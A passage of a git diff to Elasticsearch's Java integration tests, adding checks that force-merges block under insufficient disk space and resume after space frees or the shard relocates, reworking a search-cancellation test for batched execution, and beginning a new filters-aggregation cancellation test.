@Override @@ -155,8 +183,225 @@ public void testShardCloseWhenDiskSpaceInsufficient() throws Exception { }); } + public void testForceMergeIsBlockedThenUnblocked() throws Exception { + String node = internalCluster().startNode(); + ensureStableCluster(1); + setTotalSpace(node, Long.MAX_VALUE); + ThreadPoolMergeExecutorService threadPoolMergeExecutorService = internalCluster().getInstance(IndicesService.class, node) + .getThreadPoolMergeExecutorService(); + TestTelemetryPlugin testTelemetryPlugin = getTelemetryPlugin(node); + // create some index + final String indexName = randomAlphaOfLength(10).toLowerCase(Locale.ROOT); + createIndex( + indexName, + Settings.builder().put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0).put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1).build() + ); + ensureGreen(indexName); + // get current disk space usage (for all indices on the node) + IndicesStatsResponse stats = indicesAdmin().prepareStats().clear().setStore(true).get(); + long usedDiskSpaceAfterIndexing = stats.getTotal().getStore().sizeInBytes(); + // restrict the total disk space such that the next merge does not have sufficient disk space + long insufficientTotalDiskSpace = usedDiskSpaceAfterIndexing + MERGE_DISK_HIGH_WATERMARK_BYTES - randomLongBetween(1L, 10L); + setTotalSpace(node, insufficientTotalDiskSpace); + // node stats' FS stats should report that there is insufficient disk space available + assertBusy(() -> { + NodesStatsResponse nodesStatsResponse = client().admin().cluster().prepareNodesStats().setFs(true).get(); + assertThat(nodesStatsResponse.getNodes().size(), equalTo(1)); + NodeStats nodeStats = nodesStatsResponse.getNodes().get(0); + assertThat(nodeStats.getFs().getTotal().getTotal().getBytes(), equalTo(insufficientTotalDiskSpace)); + assertThat(nodeStats.getFs().getTotal().getAvailable().getBytes(), lessThan(MERGE_DISK_HIGH_WATERMARK_BYTES)); + }); + int indexingRounds = randomIntBetween(2, 5); + while (indexingRounds-- > 0) { + indexRandom( + true, + true, + true, + false, + IntStream.range(1, randomIntBetween(2, 5)) + .mapToObj(i -> prepareIndex(indexName).setSource("field", randomAlphaOfLength(50))) + .toList() + ); + } + // the max segments argument makes it a blocking call + ActionFuture forceMergeFuture = indicesAdmin().prepareForceMerge(indexName).setMaxNumSegments(1).execute(); + assertBusy(() -> { + // merge executor says merging is blocked due to insufficient disk space while there is a single merge task enqueued + assertThat(threadPoolMergeExecutorService.getMergeTasksQueueLength(), equalTo(1)); + assertTrue(threadPoolMergeExecutorService.isMergingBlockedDueToInsufficientDiskSpace()); + // telemetry says that there are indeed some segments enqueued to be merged + testTelemetryPlugin.collect(); + assertThat( + testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_QUEUED_USAGE).getLast().getLong(), + greaterThan(0L) + ); + // but still no merges are currently running + assertThat( + testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_RUNNING_USAGE).getLast().getLong(), + equalTo(0L) + ); + // indices stats also says that no merge is currently running (blocked merges are NOT considered as "running") + IndicesStatsResponse indicesStatsResponse = client().admin().indices().prepareStats(indexName).setMerge(true).get(); + long currentMergeCount = indicesStatsResponse.getIndices().get(indexName).getPrimaries().merge.getCurrent(); + assertThat(currentMergeCount, equalTo(0L)); + }); + // the force merge call is still blocked + assertFalse(forceMergeFuture.isCancelled()); + assertFalse(forceMergeFuture.isDone()); + // merge executor still confirms merging is blocked due to insufficient disk space + assertTrue(threadPoolMergeExecutorService.isMergingBlockedDueToInsufficientDiskSpace()); + // make disk space available in order to unblock the merge + if (randomBoolean()) { + setTotalSpace(node, Long.MAX_VALUE); + } else { + updateClusterSettings( + Settings.builder().put(ThreadPoolMergeExecutorService.INDICES_MERGE_DISK_HIGH_WATERMARK_SETTING.getKey(), "0b") + ); + } + // wait for the merge call to return + safeGet(forceMergeFuture); + IndicesStatsResponse indicesStatsResponse = indicesAdmin().prepareStats(indexName).setMerge(true).get(); + testTelemetryPlugin.collect(); + // assert index stats and telemetry report no merging in progress (after force merge returned) + long currentMergeCount = indicesStatsResponse.getIndices().get(indexName).getPrimaries().merge.getCurrent(); + assertThat(currentMergeCount, equalTo(0L)); + assertThat(testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_QUEUED_USAGE).getLast().getLong(), equalTo(0L)); + assertThat(testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_RUNNING_USAGE).getLast().getLong(), equalTo(0L)); + // but some merging took place (there might have been other merges automatically triggered before the force merge call) + long totalMergeCount = indicesStatsResponse.getIndices().get(indexName).getPrimaries().merge.getTotal(); + assertThat(totalMergeCount, greaterThan(0L)); + assertThat(testTelemetryPlugin.getLongCounterMeasurement(MergeMetrics.MERGE_DOCS_TOTAL).getLast().getLong(), greaterThan(0L)); + // assert there's a single segment after the force merge + List shardSegments = getShardSegments(indexName); + assertThat(shardSegments.size(), equalTo(1)); + assertThat(shardSegments.get(0).getSegments().size(), equalTo(1)); + assertAcked(indicesAdmin().prepareDelete(indexName).get()); + } + + public void testRelocationWhileForceMerging() throws Exception { + final String node1 = internalCluster().startNode(); + ensureStableCluster(1); + setTotalSpace(node1, Long.MAX_VALUE); + String indexName = randomAlphaOfLength(10).toLowerCase(Locale.ROOT); + createIndex( + indexName, + Settings.builder().put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0).put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1).build() + ); + ensureGreen(indexName); + // get current disk space usage (for all indices on the node) + IndicesStatsResponse stats = indicesAdmin().prepareStats().clear().setStore(true).get(); + long usedDiskSpaceAfterIndexing = stats.getTotal().getStore().sizeInBytes(); + // restrict the total disk space such that the next merge does not have sufficient disk space + long insufficientTotalDiskSpace = usedDiskSpaceAfterIndexing + MERGE_DISK_HIGH_WATERMARK_BYTES - randomLongBetween(1L, 10L); + setTotalSpace(node1, insufficientTotalDiskSpace); + // node stats' FS stats should report that there is insufficient disk space available + assertBusy(() -> { + NodesStatsResponse nodesStatsResponse = client().admin().cluster().prepareNodesStats().setFs(true).get(); + assertThat(nodesStatsResponse.getNodes().size(), equalTo(1)); + NodeStats nodeStats = nodesStatsResponse.getNodes().get(0); + assertThat(nodeStats.getFs().getTotal().getTotal().getBytes(), equalTo(insufficientTotalDiskSpace)); + assertThat(nodeStats.getFs().getTotal().getAvailable().getBytes(), lessThan(MERGE_DISK_HIGH_WATERMARK_BYTES)); + }); + int indexingRounds = randomIntBetween(5, 10); + while (indexingRounds-- > 0) { + indexRandom( + true, + true, + true, + false, + IntStream.range(1, randomIntBetween(5, 10)) + .mapToObj(i -> prepareIndex(indexName).setSource("field", randomAlphaOfLength(50))) + .toList() + ); + } + // the max segments argument makes it a blocking call + ActionFuture forceMergeBeforeRelocationFuture = indicesAdmin().prepareForceMerge(indexName) + .setMaxNumSegments(1) + .execute(); + ThreadPoolMergeExecutorService threadPoolMergeExecutorService = internalCluster().getInstance(IndicesService.class, node1) + .getThreadPoolMergeExecutorService(); + TestTelemetryPlugin testTelemetryPlugin = getTelemetryPlugin(node1); + assertBusy(() -> { + // merge executor says merging is blocked due to insufficient disk space + assertThat(threadPoolMergeExecutorService.getMergeTasksQueueLength(), greaterThan(0)); + assertTrue(threadPoolMergeExecutorService.isMergingBlockedDueToInsufficientDiskSpace()); + // telemetry says that there are indeed some segments enqueued to be merged + testTelemetryPlugin.collect(); + assertThat( + testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_QUEUED_USAGE).getLast().getLong(), + greaterThan(0L) + ); + // but still no merges are currently running + assertThat( + testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_RUNNING_USAGE).getLast().getLong(), + equalTo(0L) + ); + // indices stats also says that no merge is currently running (blocked merges are NOT considered as "running") + IndicesStatsResponse indicesStatsResponse = client().admin().indices().prepareStats(indexName).setMerge(true).get(); + long currentMergeCount = indicesStatsResponse.getIndices().get(indexName).getPrimaries().merge.getCurrent(); + assertThat(currentMergeCount, equalTo(0L)); + }); + // the force merge call is still blocked + assertFalse(forceMergeBeforeRelocationFuture.isCancelled()); + assertFalse(forceMergeBeforeRelocationFuture.isDone()); + // merge executor still confirms merging is blocked due to insufficient disk space + assertTrue(threadPoolMergeExecutorService.isMergingBlockedDueToInsufficientDiskSpace()); + IndicesSegmentResponse indicesSegmentResponseBeforeRelocation = indicesAdmin().prepareSegments(indexName).get(); + // the index should have more than 1 segments at this stage + assertThat( + indicesSegmentResponseBeforeRelocation.getIndices().get(indexName).iterator().next().shards()[0].getSegments(), + iterableWithSize(greaterThan(1)) + ); + // start another node + final String node2 = internalCluster().startNode(); + ensureStableCluster(2); + setTotalSpace(node2, Long.MAX_VALUE); + // relocate the shard from node1 to node2 + ClusterRerouteUtils.reroute(client(), new MoveAllocationCommand(indexName, 0, node1, node2, Metadata.DEFAULT_PROJECT_ID)); + ClusterHealthResponse clusterHealthResponse = clusterAdmin().prepareHealth(TEST_REQUEST_TIMEOUT) + .setWaitForEvents(Priority.LANGUID) + .setWaitForNoRelocatingShards(true) + .setTimeout(ACCEPTABLE_RELOCATION_TIME) + .get(); + assertThat(clusterHealthResponse.isTimedOut(), equalTo(false)); + // the force merge call is now unblocked + assertBusy(() -> { + assertTrue(forceMergeBeforeRelocationFuture.isDone()); + assertFalse(forceMergeBeforeRelocationFuture.isCancelled()); + }); + // there is some merging going on in the {@code PostRecoveryMerger} after recovery, but that's not guaranteeing us a single segment, + // so let's trigger a force merge to 1 segment again (this one should succeed promptly) + indicesAdmin().prepareForceMerge(indexName).setMaxNumSegments(1).get(); + IndicesSegmentResponse indicesSegmentResponseAfterRelocation = indicesAdmin().prepareSegments(indexName).get(); + // assert there's only one segment now + assertThat( + indicesSegmentResponseAfterRelocation.getIndices().get(indexName).iterator().next().shards()[0].getSegments(), + iterableWithSize(1) + ); + // also assert that the shard was indeed moved to a different node + assertThat( + indicesSegmentResponseAfterRelocation.getIndices().get(indexName).iterator().next().shards()[0].getShardRouting() + .currentNodeId(), + not( + equalTo( + indicesSegmentResponseBeforeRelocation.getIndices().get(indexName).iterator().next().shards()[0].getShardRouting() + .currentNodeId() + ) + ) + ); + } + public void setTotalSpace(String dataNodeName, long totalSpace) { getTestFileStore(dataNodeName).setTotalSpace(totalSpace); refreshClusterInfo(); } + + private TestTelemetryPlugin getTelemetryPlugin(String dataNodeName) { + var plugin = internalCluster().getInstance(PluginsService.class, dataNodeName) + .filterPlugins(TestTelemetryPlugin.class) + .findFirst() + .orElseThrow(); + plugin.resetMeter(); + return plugin; + } } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerStressTestIT.java b/server/src/internalClusterTest/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerStressTestIT.java index 9129292d43837..41a05202b2357 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerStressTestIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerStressTestIT.java @@ -16,6 +16,7 @@ import org.elasticsearch.action.admin.indices.segments.IndexShardSegments; import org.elasticsearch.action.admin.indices.segments.IndicesSegmentResponse; import org.elasticsearch.action.admin.indices.segments.ShardSegments; +import org.elasticsearch.action.admin.indices.stats.IndicesStatsResponse; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.util.CollectionUtils; import org.elasticsearch.common.util.concurrent.ConcurrentCollections; @@ -44,6 +45,7 @@ import java.util.concurrent.atomic.AtomicReference; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAllSuccessful; +import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThanOrEqualTo; import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.is; @@ -272,12 +274,11 @@ public void testMergingFallsBehindAndThenCatchesUp() throws Exception { assertThat(testEnginePlugin.enqueuedMergesSet.size(), is(0)); testEnginePlugin.mergeExecutorServiceReference.get().allDone(); }, 1, TimeUnit.MINUTES); - var segmentsCountAfterMergingCaughtUp = getSegmentsCountForAllShards("index"); - // force merge should be a noop after all available merging was done - assertAllSuccessful(indicesAdmin().prepareForceMerge("index").get()); - var segmentsCountAfterForceMerge = getSegmentsCountForAllShards("index"); - assertThat(segmentsCountAfterForceMerge, is(segmentsCountAfterMergingCaughtUp)); - // let's also run a force-merge to 1 segment + // indices stats says that no merge is currently running (meaning merging did catch up) + IndicesStatsResponse indicesStatsResponse = client().admin().indices().prepareStats("index").setMerge(true).get(); + long currentMergeCount = indicesStatsResponse.getIndices().get("index").getPrimaries().merge.getCurrent(); + assertThat(currentMergeCount, equalTo(0L)); + // run a force-merge to 1 segment to make sure nothing is broken assertAllSuccessful(indicesAdmin().prepareForceMerge("index").setMaxNumSegments(1).get()); assertAllSuccessful(indicesAdmin().prepareRefresh("index").get()); // assert one segment per shard @@ -292,20 +293,6 @@ public void testMergingFallsBehindAndThenCatchesUp() throws Exception { } } - private int getSegmentsCountForAllShards(String indexName) { - // refresh, otherwise we'd be still seeing the old merged-away segments - assertAllSuccessful(indicesAdmin().prepareRefresh(indexName).get()); - int count = 0; - IndicesSegmentResponse indicesSegmentResponse = indicesAdmin().prepareSegments(indexName).get(); - Iterator indexShardSegmentsIterator = indicesSegmentResponse.getIndices().get(indexName).iterator(); - while (indexShardSegmentsIterator.hasNext()) { - for (ShardSegments segments : indexShardSegmentsIterator.next()) { - count += segments.getSegments().size(); - } - } - return count; - } - private TestEnginePlugin getTestEnginePlugin() { return getInstanceFromNode(PluginsService.class).filterPlugins(TestEnginePlugin.class).toList().get(0); } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandIT.java b/server/src/internalClusterTest/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandIT.java index b9513dfb95187..d1cff7b2a30d1 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandIT.java @@ -58,6 +58,7 @@ import org.elasticsearch.plugins.Plugin; import org.elasticsearch.test.CorruptionUtils; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.InternalSettingsPlugin; import org.elasticsearch.test.InternalTestCluster; import org.elasticsearch.test.engine.MockEngineSupport; @@ -93,6 +94,7 @@ import static org.hamcrest.Matchers.startsWith; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0) +@ESTestCase.WithoutEntitlements // commands don't run with entitlements enforced public class RemoveCorruptedShardDataCommandIT extends ESIntegTestCase { @Override diff --git a/server/src/internalClusterTest/java/org/elasticsearch/index/store/DirectIOIT.java b/server/src/internalClusterTest/java/org/elasticsearch/index/store/DirectIOIT.java index c80eac73f4f6a..f7707d27b41e7 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/index/store/DirectIOIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/index/store/DirectIOIT.java @@ -17,10 +17,12 @@ import org.apache.lucene.store.IndexOutput; import org.apache.lucene.tests.util.LuceneTestCase; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.index.codec.vectors.es818.ES818BinaryQuantizedVectorsFormat; import org.elasticsearch.plugins.Plugin; import org.elasticsearch.search.vectors.KnnSearchBuilder; import org.elasticsearch.search.vectors.VectorData; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.InternalSettingsPlugin; import org.elasticsearch.test.MockLog; import org.elasticsearch.test.junit.annotations.TestLogging; @@ -40,10 +42,12 @@ import static org.hamcrest.Matchers.is; @LuceneTestCase.SuppressCodecs("*") // only use our own codecs +@ESTestCase.WithoutEntitlements // requires entitlement delegation ES-10920 public class DirectIOIT extends ESIntegTestCase { @BeforeClass public static void checkSupported() throws IOException { + assumeTrue("test requires direct IO", ES818BinaryQuantizedVectorsFormat.USE_DIRECT_IO); Path path = createTempDir("directIOProbe"); try (Directory dir = open(path); IndexOutput out = dir.createOutput("out", IOContext.DEFAULT)) { out.writeString("test"); diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/SearchCancellationIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/SearchCancellationIT.java index c2feaa4e6fe9f..4771764a11b23 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/search/SearchCancellationIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/SearchCancellationIT.java @@ -29,7 +29,7 @@ import org.elasticsearch.script.ScriptType; import org.elasticsearch.search.aggregations.bucket.terms.TermsAggregationBuilder; import org.elasticsearch.search.aggregations.metrics.ScriptedMetricAggregationBuilder; -import org.elasticsearch.search.internal.ReaderContext; +import org.elasticsearch.search.internal.SearchContext; import org.elasticsearch.tasks.Task; import org.elasticsearch.tasks.TaskCancelledException; import org.elasticsearch.test.AbstractSearchCancellationTestCase; @@ -42,6 +42,7 @@ import java.util.concurrent.CountDownLatch; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicBoolean; +import java.util.concurrent.atomic.AtomicReference; import static org.elasticsearch.index.query.QueryBuilders.matchAllQuery; import static org.elasticsearch.index.query.QueryBuilders.scriptQuery; @@ -240,80 +241,103 @@ public void testCancelMultiSearch() throws Exception { } public void testCancelFailedSearchWhenPartialResultDisallowed() throws Exception { - // TODO: make this test compatible with batched execution, currently the exceptions are slightly different with batched - updateClusterSettings(Settings.builder().put(SearchService.BATCHED_QUERY_PHASE.getKey(), false)); - // Have at least two nodes so that we have parallel execution of two request guaranteed even if max concurrent requests per node - // are limited to 1 - internalCluster().ensureAtLeastNumDataNodes(2); - int numberOfShards = between(2, 5); - createIndex("test", numberOfShards, 0); - indexTestData(); - - // Define (but don't run) the search request, expecting a partial shard failure. We will run it later. - Thread searchThread = new Thread(() -> { - logger.info("Executing search"); - SearchPhaseExecutionException e = expectThrows( - SearchPhaseExecutionException.class, - prepareSearch("test").setSearchType(SearchType.QUERY_THEN_FETCH) - .setQuery(scriptQuery(new Script(ScriptType.INLINE, "mockscript", SEARCH_BLOCK_SCRIPT_NAME, Collections.emptyMap()))) - .setAllowPartialSearchResults(false) - .setSize(1000) - ); - assertThat(e.getMessage(), containsString("Partial shards failure")); - }); - - // When the search request executes, block all shards except 1. - final List searchShardBlockingPlugins = initSearchShardBlockingPlugin(); - AtomicBoolean letOneShardProceed = new AtomicBoolean(); - // Ensure we have at least one task waiting on the latch - CountDownLatch waitingTaskLatch = new CountDownLatch(1); - CountDownLatch shardTaskLatch = new CountDownLatch(1); - for (SearchShardBlockingPlugin plugin : searchShardBlockingPlugins) { - plugin.setRunOnNewReaderContext((ReaderContext c) -> { - if (letOneShardProceed.compareAndSet(false, true)) { - // Let one shard continue. - } else { - // Signal that we have a task waiting on the latch - waitingTaskLatch.countDown(); - safeAwait(shardTaskLatch); // Block the other shards. - } + boolean useBatched = randomBoolean(); + try { + if (useBatched == false) { // It's true by default + updateClusterSettings(Settings.builder().put(SearchService.BATCHED_QUERY_PHASE.getKey(), false)); + } + // Have at least two nodes so that we have parallel execution of two request guaranteed even if max concurrent requests per node + // are limited to 1 + internalCluster().ensureAtLeastNumDataNodes(2); + int numberOfShards = between(2, 5); + createIndex("test", numberOfShards, 0); + indexTestData(); + + // Define (but don't run) the search request, expecting a partial shard failure. We will run it later. + Thread searchThread = new Thread(() -> { + logger.info("Executing search"); + SearchPhaseExecutionException e = expectThrows( + SearchPhaseExecutionException.class, + prepareSearch("test").setSearchType(SearchType.QUERY_THEN_FETCH) + .setQuery( + scriptQuery(new Script(ScriptType.INLINE, "mockscript", SEARCH_BLOCK_SCRIPT_NAME, Collections.emptyMap())) + ) + .setAllowPartialSearchResults(false) + .setSize(1000) + ); + assertThat(e.getMessage(), containsString("Partial shards failure")); }); - } - // For the shard that was allowed to proceed, have a single query-execution thread throw an exception. - final List plugins = initBlockFactory(); - AtomicBoolean oneThreadWillError = new AtomicBoolean(); - for (ScriptedBlockPlugin plugin : plugins) { - plugin.disableBlock(); - plugin.setBeforeExecution(() -> { - if (oneThreadWillError.compareAndSet(false, true)) { - // wait for some task to get to the latch - safeAwait(waitingTaskLatch); - // then throw the exception - throw new IllegalStateException("This will cancel the ContextIndexSearcher.search task"); - } - }); - } + // When the search request executes, allow some shards to proceed and block others + final List searchShardBlockingPlugins = initSearchShardBlockingPlugin(); + CountDownLatch waitingTaskLatch = new CountDownLatch(1); + CountDownLatch shardTaskLatch = new CountDownLatch(1); + final AtomicReference selectedNodeId = new AtomicReference<>(); + final AtomicBoolean letOneShardProceed = new AtomicBoolean(); + for (SearchShardBlockingPlugin plugin : searchShardBlockingPlugins) { + plugin.setRunOnPreQueryPhase((SearchContext c) -> { + if (useBatched) { // Allow all the shards on one node to continue. Block all others. + String nodeId = c.shardTarget().getNodeId(); + if (selectedNodeId.compareAndSet(null, nodeId) || nodeId.equals(selectedNodeId.get())) { + logger.info("Allowing shard [{}] on node [{}] to proceed", c.shardTarget().getShardId(), nodeId); + } else { + logger.info("Blocking shard [{}] on node [{}]", c.shardTarget().getShardId(), nodeId); + // Signal that we have a task waiting on the latch + waitingTaskLatch.countDown(); + safeAwait(shardTaskLatch); // Block shards on other nodes + } + } else { // Allow one shard to continue. Block all others. + if (letOneShardProceed.compareAndSet(false, true)) { + logger.info("Allowing shard [{}] to proceed", c.shardTarget().getShardId()); + } else { + logger.info("Blocking shard [{}]", c.shardTarget().getShardId()); + // Signal that we have a task waiting on the latch + waitingTaskLatch.countDown(); + safeAwait(shardTaskLatch); // Block all other shards + } + } + }); + } - // Now run the search request. - logger.info("Starting search thread"); - searchThread.start(); + // For the shards that were allowed to proceed, have a single query-execution thread throw an exception. + final List plugins = initBlockFactory(); + AtomicBoolean oneThreadWillError = new AtomicBoolean(); + for (ScriptedBlockPlugin plugin : plugins) { + plugin.disableBlock(); + plugin.setBeforeExecution(() -> { + if (oneThreadWillError.compareAndSet(false, true)) { + // wait for some task to get to the latch + safeAwait(waitingTaskLatch); + // then throw the exception + throw new IllegalStateException("This will cancel the ContextIndexSearcher.search task"); + } + }); + } - try { - assertBusy(() -> { - final List coordinatorSearchTask = getCoordinatorSearchTasks(); - logger.info("Checking tasks: {}", coordinatorSearchTask); - assertThat("The Coordinator should have one SearchTask.", coordinatorSearchTask, hasSize(1)); - assertTrue("The SearchTask should be cancelled.", coordinatorSearchTask.get(0).isCancelled()); - for (var shardQueryTask : getShardQueryTasks()) { - assertTrue("All SearchShardTasks should then be cancelled", shardQueryTask.isCancelled()); - } - }, 30, TimeUnit.SECONDS); + // Now run the search request. + logger.info("Starting search thread"); + searchThread.start(); + + try { + assertBusy(() -> { + final List coordinatorSearchTask = getCoordinatorSearchTasks(); + logger.info("Checking tasks: {}", coordinatorSearchTask); + assertThat("The Coordinator should have one SearchTask.", coordinatorSearchTask, hasSize(1)); + assertTrue("The SearchTask should be cancelled.", coordinatorSearchTask.get(0).isCancelled()); + for (var shardQueryTask : getShardQueryTasks()) { + assertTrue("All SearchShardTasks should then be cancelled", shardQueryTask.isCancelled()); + } + }, 30, TimeUnit.SECONDS); + } finally { + shardTaskLatch.countDown(); // unblock the shardTasks, allowing the test to conclude. + searchThread.join(); + plugins.forEach(plugin -> plugin.setBeforeExecution(() -> {})); + searchShardBlockingPlugins.forEach(plugin -> plugin.setRunOnPreQueryPhase((SearchContext c) -> {})); + } } finally { - shardTaskLatch.countDown(); // unblock the shardTasks, allowing the test to conclude. - searchThread.join(); - plugins.forEach(plugin -> plugin.setBeforeExecution(() -> {})); - searchShardBlockingPlugins.forEach(plugin -> plugin.setRunOnNewReaderContext((ReaderContext c) -> {})); + if (useBatched == false) { + updateClusterSettings(Settings.builder().putNull(SearchService.BATCHED_QUERY_PHASE.getKey())); + } } } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/SearchWithRejectionsIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/SearchWithRejectionsIT.java index 8081c05945da6..dd73522d09b42 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/search/SearchWithRejectionsIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/SearchWithRejectionsIT.java @@ -58,7 +58,7 @@ public void testOpenContextsAfterRejections() throws Exception { } assertBusy( () -> assertThat(indicesAdmin().prepareStats().get().getTotal().getSearch().getOpenContexts(), equalTo(0L)), - 1, + 2, TimeUnit.SECONDS ); } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/aggregations/bucket/FiltersCancellationIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/aggregations/bucket/FiltersCancellationIT.java new file mode 100644 index 0000000000000..1ef832c57ce2f --- /dev/null +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/aggregations/bucket/FiltersCancellationIT.java @@ -0,0 +1,236 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.search.aggregations.bucket; + +import org.elasticsearch.action.bulk.BulkRequestBuilder; +import org.elasticsearch.action.search.SearchRequestBuilder; +import org.elasticsearch.action.search.TransportSearchAction; +import org.elasticsearch.action.support.WriteRequest; +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.util.CollectionUtils; +import org.elasticsearch.core.TimeValue; +import org.elasticsearch.index.mapper.OnScriptError; +import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.plugins.ScriptPlugin; +import org.elasticsearch.script.LongFieldScript; +import org.elasticsearch.script.ScriptContext; +import org.elasticsearch.script.ScriptEngine; +import org.elasticsearch.search.aggregations.bucket.filter.FiltersAggregator.KeyedFilter; +import org.elasticsearch.search.lookup.SearchLookup; +import org.elasticsearch.tasks.TaskInfo; +import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.json.JsonXContent; +import org.junit.Before; + +import java.util.Collection; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.concurrent.Semaphore; + +import static org.elasticsearch.index.query.QueryBuilders.termQuery; +import static org.elasticsearch.search.aggregations.AggregationBuilders.filters; +import static org.elasticsearch.search.aggregations.AggregationBuilders.terms; +import static org.hamcrest.Matchers.empty; +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.greaterThan; +import static org.hamcrest.Matchers.not; + +/** + * Ensures the filters aggregation checks task cancellation, by ensuring it doesn't process all the docs. + *

+ * The CancellableBulkScorer we use to break the execution is called per search thread in the query. + * It currently breaks the "for each doc" into blocks of 4096 docs (x2 every iteration), and checks for cancellation between blocks. + * This test creates N docs and releases N - X permits, to ensure the search request gets cancelled before grabbing all the permits. + *

+ *

+ * Also, if the search thread pool size is too high, it can lead to them trying to process too many documents anyway (pool size * 4096), + * eventually blocking the threads (And failing the test). So it's explicitly set to a small number to avoid this. + *

+ */ +@ESIntegTestCase.SuiteScopeTestCase +public class FiltersCancellationIT extends ESIntegTestCase { + + private static final String INDEX = "idx"; + private static final String PAUSE_FIELD = "pause"; + private static final String NUMERIC_FIELD = "value"; + + private static final int NUM_DOCS = 100_000; + private static final int SEMAPHORE_PERMITS = NUM_DOCS - 1000; + private static final Semaphore SCRIPT_SEMAPHORE = new Semaphore(0); + + @Override + protected Collection> nodePlugins() { + return CollectionUtils.appendToCopy(super.nodePlugins(), PauseScriptPlugin.class); + } + + @Override + public Settings nodeSettings(int nodeOrdinal, Settings otherSettings) { + return Settings.builder().put(super.nodeSettings(nodeOrdinal, otherSettings)).put("thread_pool.search.size", 4).build(); + } + + @Override + public void setupSuiteScopeCluster() throws Exception { + try (XContentBuilder mapping = JsonXContent.contentBuilder()) { + mapping.startObject(); + mapping.startObject("runtime"); + { + mapping.startObject(PAUSE_FIELD); + { + mapping.field("type", "long"); + mapping.startObject("script").field("source", "").field("lang", PauseScriptPlugin.PAUSE_SCRIPT_LANG).endObject(); + } + mapping.endObject(); + mapping.startObject(NUMERIC_FIELD); + { + mapping.field("type", "long"); + } + mapping.endObject(); + } + mapping.endObject(); + mapping.endObject(); + + client().admin().indices().prepareCreate(INDEX).setMapping(mapping).get(); + } + + int DOCS_PER_BULK = 100_000; + for (int i = 0; i < NUM_DOCS; i += DOCS_PER_BULK) { + BulkRequestBuilder bulk = client().prepareBulk().setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + for (int j = 0; j < DOCS_PER_BULK; j++) { + int docId = i + j; + bulk.add(prepareIndex(INDEX).setId(Integer.toString(docId)).setSource(NUMERIC_FIELD, docId)); + } + bulk.get(); + } + + client().admin().indices().prepareForceMerge(INDEX).setMaxNumSegments(1).get(); + } + + @Before + public void reset() { + SCRIPT_SEMAPHORE.drainPermits(); + } + + public void testFiltersCountCancellation() throws Exception { + ensureProperCancellation( + client().prepareSearch(INDEX) + .addAggregation( + filters( + "filters", + new KeyedFilter[] { + new KeyedFilter("filter1", termQuery(PAUSE_FIELD, 1)), + new KeyedFilter("filter2", termQuery(PAUSE_FIELD, 2)) } + ) + ) + ); + } + + public void testFiltersSubAggsCancellation() throws Exception { + ensureProperCancellation( + client().prepareSearch(INDEX) + .addAggregation( + filters( + "filters", + new KeyedFilter[] { + new KeyedFilter("filter1", termQuery(PAUSE_FIELD, 1)), + new KeyedFilter("filter2", termQuery(PAUSE_FIELD, 2)) } + ).subAggregation(terms("sub").field(PAUSE_FIELD)) + ) + ); + } + + private void ensureProperCancellation(SearchRequestBuilder searchRequestBuilder) throws Exception { + var searchRequestFuture = 